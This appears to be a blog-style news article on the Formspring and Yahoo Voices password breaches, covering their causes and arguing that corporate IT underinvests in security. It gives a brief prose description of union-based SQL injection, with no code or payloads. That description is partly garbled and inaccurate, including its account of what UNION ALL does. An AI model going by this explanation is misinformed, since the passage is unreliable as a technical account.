The most recent breaches have come at Formspring and now apparently Yahoo. Formspring discovered the breach by accident and in response disabled their entire user base while they figured things out. After they reported that the breach was fixed all users were prompted to change their passwords after logging in. This was done as a preventative measure to make sure that no one could use the old passwords to gain access and should be the default action upon learning of a user account breach. We have to say that while Formspring users might have been inconvenienced a little by the lack of access the immediate change forcing of users to change their passwords is a good idea.
The actual breach came through an exposed development server which granted them access to the user database. Formspring states that they are revising their internal policies to prevent this type of breach in the future. The number of stolen passwords was 420,000 for this attack.
This morning we hear that Yahoo has also been hit with an estimated 453,000 user passwords stolen. This time the access was through an unsecured subdomain associated with Yahoo Voices. Looking at the data available the attackers (D33D Company) hit an edge server that is exposed on the web with a union-based SQL injection in order to gain access.
In a union SQL injection the attackers attempt to send a SQL query to the target database using a NULL statement in the id parameter to combine the results of specific tables or columns in a database (like users or passwords. The UNION command is what allows you to pull data from a different table or column and combine the output. By adding in the term ALL you are able to pull data that is different from the original source data tablet or column. For example if you were able to identify a single tablet entry in a database such as “details” you could use that to create a string using a NULL id for the “details” table by grab other information by using UNION ALL .
This means that there was not only a flaw in that server which exposed the table or column name (usually a table), but also in the database that allowed the response to the union command. Yahoo has been criticized for poor security policies lately with mutlitple items, but most notably for the apparent lack of security in their Yahoo Mail app for Android which sends user names and passwords unencrypted by default according to two mobile security firms. D33D Company says that the breach and exposure of user passwords was intended to be a wakeup call for Yahoo and others before more damage was done.
It is very clear that the reports we have heard of companies cutting back on IT spending for security and server updates are most likely true. This is despite some estimates showing corporate IT spending in the trillions of dollars. What we suspect is that much of that spending is being done on the front end and not on areas that are intangible like security. As an example of this type of spending I once consulted for a large law firm that spent over 300,000 on a desktop and laptop refresh, but would not spend the money needed to replace servers, many of which were well over 5 years old (some still running Windows 2000). The same is happening in other areas where network infrastructure (faster internet, improved MPLS services, faster wireless) are the sources of sending and not improved protection, backup or proper server system upgrades. It is a serious flaw in the way that IT is approached and one that we have witnessed firsthand when companies start reviewing IT budgets and spending. The thought process needs to shift though as the attacks and breaches are not likely to stop any time soon.
Discuss this in our Forum